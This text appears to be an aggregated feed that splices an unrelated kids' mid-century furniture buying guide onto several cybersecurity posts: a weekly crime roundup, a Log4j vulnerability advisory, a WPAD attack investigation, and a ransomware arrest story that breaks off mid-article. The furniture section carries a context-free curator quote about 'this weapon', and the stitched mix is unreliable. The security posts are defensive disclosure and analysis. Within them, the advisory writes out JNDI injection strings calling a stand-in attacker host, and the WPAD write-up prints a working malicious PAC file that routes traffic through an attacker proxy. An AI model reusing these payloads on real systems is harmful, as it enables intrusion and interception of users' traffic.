Mid-Century Modern Furniture For Kids’ Room

Mid-century modern (MCM) style has always fascinated people worldwide. This is probably because of its unique functionality, combined with simple shapes and neat design details. As for kids’ rooms, there are plenty of options to decorate them in this unique style. All you need is to choose the right furniture pieces.

There are plenty of great mid-century modern options on the market, but we suggest going for pieces that are both stylish and functional. We have picked out some of our favorite pieces to help you create a stylish and comfortable kids’ room.

The best kids’ mid-century furniture

There are many fantastic pieces of mid-century modern kids’ furniture available on the market. We have compiled a list of the best pieces to help you get started.

Kids’ mid century chair

One of our favorite pieces of furniture for kids’ rooms is the mid-century modern chair. These chairs for kids come in various shapes and sizes, but they all have one common feature – simplicity. This makes them perfect for any type of room, and they will easily complement the overall design.

IKARE Wooden Natural Baby High Chair

If you are looking for a stylish and functional high chair, we suggest going for the IKARE Wooden Natural Baby High Chair. This chair is perfect for kids aged 6 months and up, and it features a beautiful mid-century modern design. It is made of natural wood, which makes it both sturdy and stylish, and it will easily blend in with any room decor.

This mid-century modern high chair is designed to match right up to your dining table so that your infant may eat, play with toys, learn, and grow alongside you. Because the footplate is height-adjustable and the food tray can be removed, you may adjust the high chair when your child grows. This high chair includes a full-size high chair, a booster seat, and a toddler chair in one! With three must-have baby seats in one, this high chair has it all!

IKARE Wooden Natural Baby High Chair is constructed of beech hardwood that is durable, shock-absorbent, and shock-resistant. It includes a PP seat design that helps to enhance comfort and fatigue resistance. Comfort, balance, and ergonomics are all improved by solid construction. Your baby’s safety is most important, after all! The chair includes a 5-point safety harness system with shoulder pads and a crotch strap to offer the safest seating for your child.

KidKraft Mid-Century Kid Upholstered Reading Chair & Ottoman with Storage

Another great piece that we suggest for your kid’s room is the KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage. This kids’ reading chair features a vintage mid-century classic style, and it will quickly bring some class to your kids’ room decor. It is also very comfortable, which means that your child will be able to relax and read in style.

The chair also comes with an ottoman, which can be used as a storage unit. This is a great feature, as it will help you keep the room neat and organized. The ottoman is also very comfortable, and it will be perfect for your child to relax on.

The KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage is made of wood, making it both strong and durable. The chair is upholstered in a soft fabric, which will make it very comfortable for your child.

DIAOD Mid-Century Modern Footstool

This adorable little footstool is perfect for any kids’ room. It features a mid-century modern design, easily matching most room decor styles. It is also very comfortable, which means that your child will love to use it while playing or watching TV.

This footstool is made of plywood and fabric, so it is both lightweight and sturdy. It is effortless to move around, but it won’t be easily tipped over. The DIAOD Mid-Century Modern Footstool comes in a variety of stylish colors, so you will surely find one that matches your child’s room decor.

Christopher Knight Home Evelyn Mid Century Modern Fabric Arm Chair

With its beautiful vintage design, this armchair is a must-have for fans of the classic style. This comfy choice boasts four sturdy walnut legs, adding to the appeal of this elegant chair. The easy-to-clean fabric is perfect for busy households, and the high-density foam provides hours of relaxation.

The Evelyn Mid Century Modern Fabric Arm Chair would look great in any room and would make a perfect place for your child to relax with a good book or watch TV. The chair is also very comfortable, so your child will be able to enjoy it for hours on end.

KidKraft Mid-Century Kid Wooden Corner Reading Nook

This KidKraft Mid-Century Kid Wooden Corner Reading Nook is perfect for any kid who loves to read. It features an adorable design with adjustable shelves, making it easy to customize the nook according to your child’s needs.

Your child will love spending their time in this corner reading nook! The high back and soft cushions will make it a very comfortable place to relax. The nook is also very spacious, so your child will have plenty of room to spread out.

The product is very versatile, as it would work perfectly in any bedroom. It will help to keep your child’s room organized and neat.

AOKAEII High Back Rocker Chair & Ottoman

A staple piece in a nursery! This chair is perfect for mothers and fathers to read to their children, nurse them or just spend some quality time together. The AOKAEII High Back Rocker Chair & Ottoman is a stylish and comfortable choice that easily complements any nursery decor.

The sturdy solid rubberwood base construction gives stability when rocking. When you sit down, you feel as if you’re lying down naturally. The glider rocker has a footrest, which adds to the chair’s stability. This chair can bear up to 300 pounds.

The AOKAEII High Back Rocker Chair & Ottoman is made of the best quality materials: the 40-density high-elastic sponge is thicker and more resilient than other sponges. It’s covered with soft, high-quality linen fabrics that are both delicate and robust. It has a cushiony, wear-resistant feel and is skin-friendly and easy to maintain.

Kids’ activity tables and desks in mid-century modern style

If your kid loves to draw, color, and do other types of arts & crafts activities, a kids’ activity table is an essential piece of furniture. A good activity table should be very sturdy and durable so that it can withstand hours of use.

Milliard Kids Mid Century Modern Table and Chair Set Wooden with Storage Baskets

This great kids’ activity table is a fantastic choice for home and school use. It boasts two large storage baskets, which will help to keep your child’s room neat and organized at all times.

This table and chairs set is ideal for coloring, tea parties, car races, and so much more because it is the perfect size for young ones. This collection boasts a white and brown mid-century modern design that is appropriate in any room of the house.

The sturdy construction of this activity table, which is made out of Pine and MDF wood, makes it ideal for children to use. The table and chairs have been subjected to independent tests by an independent consumer organization for strength and safety.

Wildkin Kids Modern Study Desk with Storage and Stool

With Wildkin’s children’s desk and chair set, cater to your child’s creative side! This kids’ table and chair set is sized just right for small children looking for somewhere to let their imaginations run wild. This sturdy and sleek design makes this a great addition to bedrooms, playrooms, or living rooms.

Wildkin’s table and chairs for little ones include a storage area beneath for the child’s books, pencils, and other supplies. The desk table’s stain-resistant melamine top and tough natural wood legs guarantee that Wildkin’s desk for kids with storage and desk stool set will withstand any little artist. This desk and stool’s classic, timeless solid wood legs are both durable and safe for the kids.

Mid-century modern storage solutions for kids

Finally, we suggest that you don’t forget about toys and storage solutions. For example, an elegant wooden toy box with a sleek design would be a great option. This way, you can keep all of your precious items organized while providing an attractive storage unit for your children’s toys at the same time.

KidKraft Mid-Century Kid Bin Storage Unit

Storage units in mid-century modern style are surprisingly challenging to find. That’s why we were so happy to discover this stylish bin storage unit by KidKraft. It can be used in any part of the house, but it is ideal for bedrooms and playrooms.

The KidKraft Mid-Century Kid Bin Storage Unit is made of sturdy wood construction and a beautiful white and grey finish. It has two large bins that are perfect for storing toys, clothes, books, and other items. The bins are also removable so that they can be easily cleaned. The top of this storage unit features two open regions ideal for storing toys you want to be easily accessible.

The popular mid-century modern design style is represented by the clean lines, rounded feet, and geometric pattern on the back wall. Get the toy organization you need and the style you crave with this KidKraft storage unit.

The origins of Mid-Century Modern

Mid-century modern design was born out of the cultural zeitgeist after World War II. According to James A. Bier, Ph.D., Curator at the Smithsonian’s National Museum of American History, Americans were “reflecting on what they had done…through the creation of this weapon.” As a result, many designers began to focus on new ways to improve daily life and make it more comfortable.

One of the most iconic aspects of mid-century modern design is its organic shapes and natural materials. This was a reaction against the stark, angular lines of Art Deco and the over-the-top luxury of the previous era. Mid-century designers favored simple forms and minimal ornamentation, resulting in sleek furniture that was as comfortable as it was stylish.

Mid-century modern also focused on creating designs with a sense of lightness and balance, no matter how outlandish the shapes became. According to Bier, this style “is really about removing barriers between people and objects.” Many homeowners found they could combine pieces from different manufacturers and still have a cohesive look.

Mid-century modern was not just a design style but an entire way of life. It embraced both the city and the country, emphasizing simple living with access to modern conveniences like dishwashers, TVs, and garage doors. This generation popularized vibrant colors because they wanted to bring happiness and brightness into their homes.

If you’re looking to add a touch of mid-century modern to your home, start by incorporating natural materials like wood, metal, and glass. Keep the lines simple and avoid excessive ornamentation. Colors should be light and bright, emphasizing cool neutrals and pastels. And finally, keep an eye out for furniture pieces that are sleek, streamlined, and comfortable.

Mid-century modern designs also had a certain uniformity because of the post-war mentality “Good design was democratic” stated by George Nelson in 1976. Although there was never a clearly defined set of standards for mid-century modern homes, most houses built during this era shared similar characteristics, such as large expanses of glass, open floor plans, and a connection to the outdoors.

As we move further into the 21st century, mid-century modern design is becoming more popular than ever. If you’re looking for a way to add some timeless style to your home, look no further than mid-century modern.

Is Mid-Century Modern still in style?

Yes! Mid-century modern design is more popular than ever and shows no signs of slowing down. Mid-century modern is timeless and elegant, making it an excellent choice for those who want their home to be stylish as well as functional.

Mid-century furniture designs are a massive inspiration for interior designers because of the wide range of pieces available and the simplicity of the line. Mid-century modular sofas allow many homeowners to create their dream living room with the perfect seating arrangement.

Mid-century modern also offers homeowners a wide range of design possibilities, from sleek and simple to bold and dynamic. There’s no “one size fits all” approach to mid-century decor.

Is Mid-Century Modern furniture expensive?

No! Although some mid-century modern pieces are rare or one-of-a-kind antiques, many affordable reproductions can be found in furniture stores and online. You don’t have to spend a fortune to add some mid-century style to your home.

What are the Advantages and Disadvantages of Mid-Century Modern Design?

Mid-century modern has many advantages that continue to make it popular today. First of all, the clean, modern lines are easy to maintain, making it a great choice for homeowners who want stylish furniture but don’t require much upkeep. Mid-century modern also has a classic feel to it, which never goes out of style.

Mid-century design is focused on creating sleek and functional furniture while being comfortable at the same time. This means that many of the pieces are versatile and can be used in various settings.

However, one disadvantage of mid-century modern design is that it can be difficult to find unique pieces. Since the style is so popular, many iconic designs have been reproduced multiple times. So, if you’re looking for something truly one-of-a-kind, you may have to search harder (and for a much higher price).

The post Mid-Century Modern Furniture For Kids’ Room appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 50

The Good

This week we have another law enforcement victory to highlight. The grand jury indictment (in USA and Canada) of Matthew Philbert was the result of “Project CODA”, a joint operation between Europol, the FBI, and Canada’s Ontario Provincial Police (O.P.P.). Project CODA began in early 2020 after the FBI contacted Canadian law enforcement for help with an investigation into various ransomware attacks on U.S. businesses originating in Canada.

Philbert, described as one of Canada’s “most prolific cybercriminals”, was formally charged in connection with numerous claims of fraud and cyber crime, including ransomware attacks and bot operation. The indictment covers multiple counts from the 2018 timeframe, though the individual is allegedly tied to a host of other attacks dating back many years. Authorities also seized a plethora of laptops, phones, drives, carding blanks, and crypto-wallet metadata that assist in tying Philbert to the crimes.

Philbert was notoriously one of the original Darkode forum members back in 2009, as well as being active on many other established underground forums and markets. He has also been tied to the operation of at least one Mariposa-based botnet. Perhaps the most eye-opening aspect of the charges is the clear indication that Philbert was attacking medical facilities during the alleged time.

“On or about April 28, 2018, within the District of Alaska and elsewhere, the defendant, MATTHEW PHILBERT, knowingly caused and attempted to cause the transmission of a program, information, code, and command, and, as a result of such conduct, intentionally caused and attempted to cause damage without authorization to a protected computer owned by the State of Alaska, and the offense caused and would, if completed, have caused: (a) the modification, impairment, and potential modification and impairment of the medical examination, diagnosis, treatment and care of 1 or more individuals; (b) a threat to public health and safety; and, (c) damage affecting 10 or more protected computers during a 1-year period.”

While the events in question predate the current global situation, any attack on a medical entity is reprehensible, so we have one more victory for global law enforcement to cheer and one less prolific criminal off the grid. Hooray!

The Bad

This was a rough week for the retail industry with regard to ransomware attacks. North of 300 outlets of the SPAR supermarket chain were affected by an apparent ransomware incident. As a result of the attack, many locations were forced to close, while others had to resort to processing transactions on paper.

A SPAR spokesperson stated that the attack was:

“impacting stores’ ability to process card payments meaning that a number of SPAR stores are currently closed to shoppers or are taking only cash payments.”

At the time of writing, there is no clear indication of the ransomware family involved, nor is there any detail on the payment status of the ransom.

A similar scenario played out at The Delta-Montrose Electric Association (DMEA). The member-owned electric cooperative in Colorado has also revealed they were the subject of a breach, including the use of “file-encrypting malware”. At the time, the attack led to nearly 90% of their internal systems being out or affected in a negative way. As with the SPAR situation, there is currently no confirmed data on which ransomware family was involved.

Both victims are on the road to recovery, but these attacks serve as a reminder of the importance of prevention when it comes to ransomware.

The Ugly

Life in Russia became much more difficult for TOR users this week. On December 1, Russia’s Roskomnadzor (aka the Federal Service for Supervision of Communications, Information Technology, and Mass Media) started blocking traffic on TOR nodes. That was followed this week by a block on access to TOR’s main site.

Attempting to explain the reasons for the action, a spokesperson for Roskomnadzor said:

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content…Today, access to the resource has been restricted.”

The country’s crackdown on Tor is just the latest in a wave of censorships over the last few months that have seen Apple forced to turn off its Private Relay service, Opera to remove its browser’s VPN and ten other VPNs being blocked. In response to the latest action, the TOR team have created a website mirror which can be persistently accessed, even by citizens in Russia.

Meanwhile, a persistent, non-amateur threat actor has been running thousands of TOR relays for at least four years in what looks like a systematic Sybil attack, essentially an attempt to deanonymize TOR traffic or collect information on users to map their routes through the network.

It is estimated that, at one point, as much as 10% of the TOR network could have been under the control of a single entity. All the identified servers have been removed, but researchers believe the effort is ongoing and are actively hunting for more suspicious relays.

CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability

Executive Summary

  • A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, is being tracked as CVE-2021-44228.
  • Exploit proof-of-concept code is widely available and internet-wide scanning suggests active exploitation.
  • At the time of writing, exploit attempts lead to commodity cryptominer payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
  • Major services and applications globally are impacted by the vulnerability due to the prevalence of Log4j2’s use in many web apps.
  • Due to the ease and rate of exploitation attempts, SentinelOne recommends upgrading impacted services to the latest version of Log4j2.

Background

On December 9th, 2021, the security community became aware of active exploitation attempts of a vulnerability in Apache Log4j 2. The vulnerability in question is trivially easy to exploit and consists of a malformed Java Naming and Directory Interface (JNDI) request of the form ‘${jndi:ldap://attacker.com/file}’ (further variations are documented below). It’s difficult to assess the extent of possible impact as Log4j2 is used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, and Kafka, and even Minecraft servers. Defenders are encouraged to update any explicit uses of Log4j 2 to version 2.15.0-rc2 or higher, as well as scrutinize other services that may implicitly rely on it.

As described in the NVD vulnerability disclosure, JNDI features do not protect against requests pointing to attacker-controlled endpoints including LDAP(s), DNS, and RMI requests. The requests poll an attacker endpoint for a file that’s then executed in the context of the Log4j 2 service.

Examples:

${jndi:ldap:///}  

${jndi:dns:///} 

${jndi:ldap://${env:}./}

Further variants of the malicious request have been publicly reported and include slight obfuscation with nested functions like ${lower:} as follows:

${jndi:${lower:l}${lower:d}ap:///}
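One way to hunt for these requests in web or application logs is to resolve the nested ${lower:…} wrappers before matching, so the obfuscated and plain forms hit the same rule. This is an added example, not SentinelOne's code: the log lines and example.invalid hosts are constructed, and the handling of ${upper:…} and URL-encoded input goes beyond the variants listed above.

```python
import re
from urllib.parse import unquote

# Innermost ${lower:x} / ${upper:x} lookups (argument contains no further "${").
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# A JNDI lookup and its scheme, e.g. "${jndi:ldap:".
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _apply_case(match):
    """Replace one ${lower:x} / ${upper:x} lookup with its resolved text."""
    name, arg = match.group(1).lower(), match.group(2)
    return arg.lower() if name == "lower" else arg.upper()


def normalize(text, max_rounds=10):
    """URL-decode, then resolve nested case lookups innermost first."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(_apply_case, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_schemes(line):
    """Return the JNDI schemes (ldap, dns, rmi, ...) referenced in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines):
    """Return (line_number, schemes) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_schemes(line)
        if schemes:
            hits.append((number, schemes))
    return hits


# Constructed access-log lines (documentation addresses, example.invalid hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:08:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://ldap.example.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:08:01:19 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:${lower:l}${lower:d}ap://ldap.example.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:08:01:23 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fdns.example.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for number, schemes in scan(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {', '.join(schemes)}")
```

A match only shows that a lookup string reached the log; whether it was evaluated depends on the Log4j version and settings of the service that wrote it.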

At the time of writing, payloads include cryptominers like Golang-based Kinsing ELF payloads but there’s nothing limiting the potential for abuse as attackers ramp up their infrastructure and tooling to take advantage of this exploitation opportunity.

SentinelOne is actively monitoring the situation and collaborating with industry partners to improve the collective defense of all internet users.

Mitigation Guidance

  • Upgrade log4j 2 to the latest version, specifically log4j-2.15.0-rc2 or newer.
  • According to Apache’s guidance, in releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
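To confirm the class-removal mitigation actually landed everywhere, the following added example (not from SentinelOne or Apache) walks a directory and reports every archive, including jars nested inside fat jars and WARs, that still contains JndiLookup.class. The archive names in the demo are constructed, and relocated (shaded) copies of the class under a different package path are not detected.

```python
import io
import sys
import zipfile
from pathlib import Path

# Class path taken from the zip command in the mitigation guidance above.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def find_jndi_lookup(archive, label, max_depth=4):
    """Return labels of every archive (nested ones included) that ships JndiLookup.class.

    `archive` is a path or a binary file object; `label` is what gets reported.
    """
    hits = []
    try:
        with zipfile.ZipFile(archive) as zf:
            names = zf.namelist()
            if JNDI_CLASS in names:
                hits.append(label)
            if max_depth > 0:
                for name in names:
                    if name.lower().endswith(ARCHIVE_SUFFIXES):
                        inner = io.BytesIO(zf.read(name))
                        hits += find_jndi_lookup(inner, f"{label}!/{name}", max_depth - 1)
    except zipfile.BadZipFile:
        pass  # not a readable archive; skip it
    return hits


def scan_tree(root):
    """Scan every jar/war/ear below `root`, in sorted path order."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            hits += find_jndi_lookup(path, str(path))
    return hits


def zip_bytes(entries):
    """Build an in-memory zip from {name: bytes}; used only for the constructed demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo_fat_jar():
    """Constructed sample: an application jar bundling one unpatched and one patched log4j-core."""
    unpatched = zip_bytes({JNDI_CLASS: b"", "META-INF/MANIFEST.MF": b""})
    patched = zip_bytes({"META-INF/MANIFEST.MF": b""})
    return io.BytesIO(zip_bytes({
        "BOOT-INF/lib/log4j-core-unpatched.jar": unpatched,
        "BOOT-INF/lib/log4j-core-patched.jar": patched,
    }))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        found = scan_tree(sys.argv[1])
    else:
        found = find_jndi_lookup(demo_fat_jar(), "app.jar")
    for hit in found:
        print("JndiLookup.class present:", hit)
```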

In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years

A Guest Post By Daniel Persch, QGroup GmbH, Frankfurt am Main

The possibility of leveraging the Web Proxy Auto-Discovery (WPAD) protocol to conduct MITM (Man-in-the-Middle) attacks has been known for many years and has been described previously. However, until now, there was no known case of it occurring in-the-wild. In this post, we disclose details of such an ITW attack discovered by our incident response specialists at QGroup GmbH, Germany, who successfully investigated and mitigated the attack with the help of the SentinelOne platform.

What is WPAD?

Web Proxy Auto Discovery is a protocol used to ensure all devices on a network use the same web proxy configuration. Rather than having to manually configure each device, network administrators may use WPAD to ease the process. When enabled, WPAD searches for a Proxy Auto-Configuration (PAC) file and applies the configuration automatically.

On a typical router, a default DHCP server is configured to enable easy client connectivity. This DHCP server includes a default domain suffix (for example: example.com) which will be assigned to the clients. Clients within the network retrieve that domain name when connecting via cable or Wi-Fi to that network together with the IP address from the DHCP server.

After retrieving an IP address and domain suffix via DHCP from a router, if WPAD is enabled and no WPAD URL is explicitly specified by the DHCP server, the OS tries the following URLs to retrieve appropriate proxy settings for the connection:

http://wpad.department.branch.example.com/wpad.dat 
http://wpad.branch.example.com/wpad.dat
http://wpad.example.com/wpad.dat
http://wpad/wpad.dat

The domain part of these URLs is replaced by the domain suffix assigned by the DHCP server. If a publicly reachable fully-qualified domain name (FQDN) is used, the URL will be requested from the internet accordingly. If an attacker owns the domain that is used by the internal router and the client has WPAD enabled, the attacker can redirect the traffic of internet applications using system proxy settings through the attacker’s proxy.

All the attacker needs to do is to provide a correct PAC file at one of the locations mentioned above, and the client OS will use the configuration on-the-fly without any user interaction.

WPAD Attack Details

We discovered a case where this weakness appears to have been abused for at least three years and is redirecting the internet traffic of users around the world through the attacker’s proxy.

Although more domains could be affected, the analysis below is linked to the following domain name:

domain.name

The attacker registered the publicly reachable FQDN and set up a server at wpad.domain.name, hosting a web server on the default TCP-Port 80.

The name was likely chosen in light of the fact that on some home routers, the default DNS domain setting is “domain.name”. The expansion of Top Level Domain names in recent years has made it possible to register domains with the .name TLD, so what may have once been a safe default choice has become subject to a WPAD Name Collision Vulnerability.

In the attack we discovered, the source IP of the victim seems to determine whether the server answers with an empty response or with a WPAD Proxy Auto-Configuration file. An empty response was received when we tried the following command from a German Telekom Address.

$ curl http://wpad.domain.name/wpad.dat

However, when performed using a VPN provider with outgoing IP originating in Malaysia, we received the following PAC file:

$ curl http://wpad.domain.name/wpad.dat 
function FindProxyForURL(url, host) {

	if (isPlainHostName(host) || 
		dnsDomainIs(host, ".windowsupdate.com") || 
		dnsDomainIs(host, ".microsoft.com") || 
		dnsDomainIs(host, ".baidu.com") ||
		dnsDomainIs(host, ".kaspersky.com") || 
		dnsDomainIs(host, ".axaltacs.net") || 
		dnsDomainIs(host, ".live.com") || 
		dnsDomainIs(host, ".drivergenius.com") ||
			isInNet(host, "10.0.0.0", "255.0.0.0") || 
			isInNet(host, "172.16.0.0", "255.255.224.0") || 
			isInNet(host, "192.168.0.0", "255.255.0.0") || 
			isInNet(host, "127.0.0.0", "255.0.0.0"))
		return "DIRECT"; 
	else
		return 'PROXY 185.38.111.1:8080';
}

What we can see here is that the PAC file instructs the client to use the proxy server at the following address:

185.38.111.1:8080

for all addresses except RFC1918, localhost and the following domains:

baidu.com
kaspersky.com
live.com
microsoft.com
windowsupdate.com
axaltacs.net
drivergenius.com

In other versions of this PAC file (see IoCs below), we have also seen the following lines added to the exclusions:

dnsDomainIs(host, ".googlevideo.com")
dnsDomainIs(host, ".youtube.com")

and

dnsDomainIs(host, ".dhl.com")

At the time of our investigation, the embedded IP address was providing an HTTP proxy on TCP port 8080.
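For defenders, two checks follow from the URL search order described under "What is WPAD?" and from the PAC file shown above: which WPAD hostnames a given DHCP suffix makes clients query outside zones you control, and which proxy a retrieved PAC file actually points to. The code below is an added example, not QGroup's or SentinelOne's tooling; the function names, the corp.example.com zone and the internal PAC sample are assumptions, and the first PAC sample is abridged from the one in this post.

```python
import ipaddress
import re
from urllib.parse import urlsplit

_STRING = re.compile(r"""(["'])(.*?)\1""")  # string literals in the PAC source
_DIRECTIVE = re.compile(r"^(PROXY|SOCKS[45]?|HTTPS?)\s+([^\s:;]+):(\d{1,5})$", re.IGNORECASE)


def wpad_candidates(dhcp_suffix):
    """URLs a client tries for a DHCP domain suffix, most specific first."""
    labels = [part for part in dhcp_suffix.lower().strip(".").split(".") if part]
    stop = max(len(labels) - 1, 1) if labels else 0
    urls = ["http://wpad." + ".".join(labels[i:]) + "/wpad.dat" for i in range(stop)]
    urls.append("http://wpad/wpad.dat")
    return urls


def outside_controlled_zones(dhcp_suffix, controlled_zones):
    """WPAD hostnames for this suffix that fall outside DNS zones the organisation controls."""
    zones = [zone.lower().strip(".") for zone in controlled_zones]
    leaks = []
    for url in wpad_candidates(dhcp_suffix):
        host = urlsplit(url).hostname
        if "." not in host:
            continue  # bare "wpad" is a single-label name, not a registrable domain
        if not any(host == zone or host.endswith("." + zone) for zone in zones):
            leaks.append(host)
    return leaks


def pac_proxies(pac_text):
    """Extract (type, host, port) from every proxy directive in the PAC's return strings."""
    found = []
    for _, literal in _STRING.findall(pac_text):
        for part in literal.split(";"):
            match = _DIRECTIVE.match(part.strip())
            if match:
                found.append((match.group(1).upper(), match.group(2), int(match.group(3))))
    return found


def external_proxies(pac_text):
    """Proxy directives whose host is not a private or loopback IP literal."""
    flagged = []
    for kind, host, port in pac_proxies(pac_text):
        try:
            ip = ipaddress.ip_address(host)
            internal = ip.is_private or ip.is_loopback
        except ValueError:
            internal = False  # a hostname cannot be shown internal without resolving it
        if not internal:
            flagged.append((kind, host, port))
    return flagged


# Abridged from the PAC file shown in this post.
OBSERVED_PAC = """
function FindProxyForURL(url, host) {
    if (isPlainHostName(host) ||
        dnsDomainIs(host, ".microsoft.com") ||
        isInNet(host, "10.0.0.0", "255.0.0.0"))
        return "DIRECT";
    else
        return 'PROXY 185.38.111.1:8080';
}
"""

# Constructed sample of a legitimate internal PAC file.
INTERNAL_PAC = 'function FindProxyForURL(url, host) { return "PROXY 10.20.30.40:3128; DIRECT"; }'

if __name__ == "__main__":
    print(wpad_candidates("department.branch.example.com"))
    print(outside_controlled_zones("domain.name", ["corp.example.com"]))
    print(external_proxies(OBSERVED_PAC))
```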

When using the PAC file with Firefox, we could successfully establish a connection using the proxy specified.

According to VirusTotal, the IP address, 185.38.111.1:8080, is referred to by various known malware files.

The wpad.dat PAC files containing this specific IP proxy address also have a history of being served up by a number of other known malicious sites, including:

  • stoppblock[.]net/wpad.dat
  • stoppblock[.]org/wpad.dat
  • stoppblock[.]com/wpad.dat
  • access-unstop[.]info/wpad.dat
  • accessquick[.]net/wpad.dat

SHA1: acf3275189948f095f122289d2d6ef44be6ccc4d

Many of these sites are tagged as “known infection source”, “proxy avoidance” and “malware repository, spyware and malware”.

Impact and Recommendations

While this MITM attack via rogue-proxy appears to have been in use for several years, the fact that most web traffic these days is secured with TLS means attackers need to generate certificates that the web browser would trust before they could inspect or redirect interesting traffic.

Some web sites, on the first visit, respond with an HSTS (Strict Transport Security) header that lets the browser know all future requests should always be made over TLS, thus preventing SSL Stripping attacks, a means of forcing an encrypted HTTPS connection to downgrade to insecure HTTP. According to recent data, however, only about 22% of sites are currently using HSTS. Traffic that is neither TLS- nor HSTS-protected is vulnerable to MITM attacks, and downloads over HTTP are particularly vulnerable to interception by such a rogue-proxy.

For enterprise, it’s likely the domain suffix returned by DHCP while at the office will be a domain whose DNS is controlled by the company, so it would be difficult for an attacker to add a rogue WPAD DNS entry. More commonly, home or public routers using the default “wpad.domain.name” or any other generic TLD (gTLD) name that is subject to a domain name collision could be vulnerable to such a MITM attack.

It is worth noting that in Windows 10, WPAD is enabled by default. In macOS and Linux, this setting is available but disabled by default.

Best practices for protecting against the wider WPAD Name Collision Vulnerability are outlined in this US-CERT advisory and include:

  • Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only be used on internal networks.
  • Consider using a registered and fully qualified domain name (FQDN) from global DNS as the root for enterprise and other internal namespace.
  • Consider using an internal TLD that is under your control and restricted from registration with the gTLD program.
  • Configure internal DNS servers to respond authoritatively to internal TLD queries.
  • Configure firewalls and proxies to log and block outbound requests for wpad.dat files.
  • Identify expected WPAD network traffic and monitor the public namespace or consider registering domains defensively to avoid future name collisions.

In our investigation, we were able to search for the malicious IP across all our SentinelOne instances to find a number of affected parties. Our strategic integration of SentinelOne into our security operations processes (SecOps, IR, Analytics) enabled a rapid reaction and allowed us to both immediately protect all of our customers and ad hoc identify which customers had been affected.

Conclusion

The flaws inherent in WPAD have received plenty of attention from security researchers, leading one to suggest renaming it “badWPAD” because the risks it presents stem directly from its design, rather than any faulty configuration or implementation on the network administrator’s side.

Now we know that threat actors have been paying attention, too. Combining malicious PAC files with selective domain name registrations, they have been able to compromise the traffic of internet users for years. Despite various network safeguards such as TLS and HSTS, and software download safeguards such as digital signature verification, there is still plenty of scope for malicious actors to attack unwary organizations and end users via WPAD and unencrypted traffic.

In particular, because home routers with default settings are the most affected, the trend towards remote work and Work From Home caused by the COVID-19 pandemic poses a particular risk given the rise of endpoints outside the protection of the office LAN.

With the evidence presented here of in-the-wild WPAD attacks, those risks must be mitigated by administrators by attending to the recommendations above and ensuring that they have full visibility into network traffic via a modern EDR or XDR platform.

Indicators of Compromise

SHA1 PAC files
acf3275189948f095f122289d2d6ef44be6ccc4d
6e515b52e1726a5a29de137bde03719c0a3daee9
01cb0fe80a03ecbac16f9b98fcaf0b3fce2b6b21

Observed DNS
wpad.domain[.]name
*.domain[.]name
wpad*

IP addresses
185[.]38.111.1
185[.]38.111.4
185[.]38.111.5
185[.]38.111.0/24

Canada Charges Its “Most Prolific Cybercriminal”

A 31-year-old Canadian man has been arrested and charged with fraud in connection with numerous ransomware attacks against businesses, government agencies and private citizens throughout Canada and the United States. Canadian authorities describe him as “the most prolific cybercriminal we’ve identified in Canada,” but so far they’ve released few other details about the investigation or the defendant. Helpfully, an email address and nickname apparently connected to the accused offer some additional clues.

Matthew Philbert, in 2016.

Matthew Philbert of Ottawa, Ontario was charged with fraud and conspiracy in a joint law enforcement action by Canadian and U.S. authorities dubbed “Project CODA.” The Ontario Provincial Police (OPP) on Tuesday said the investigation began in January 2020 when the U.S. Federal Bureau of Investigation (FBI) contacted them regarding ransomware attacks that were based in Canada.

“During the course of this investigation, OPP investigators determined an individual was responsible for numerous ransomware attacks affecting businesses, government agencies and private individuals throughout Canada as well as cyber-related offenses in the United States,” reads an OPP statement.

“A quantity of evidentiary materials was seized and held for investigation, including desktop and laptop computers, a tablet, several hard drives, cellphones, a Bitcoin seed phrase and a quantity of blank cards with magnetic stripes,” the statement continues.

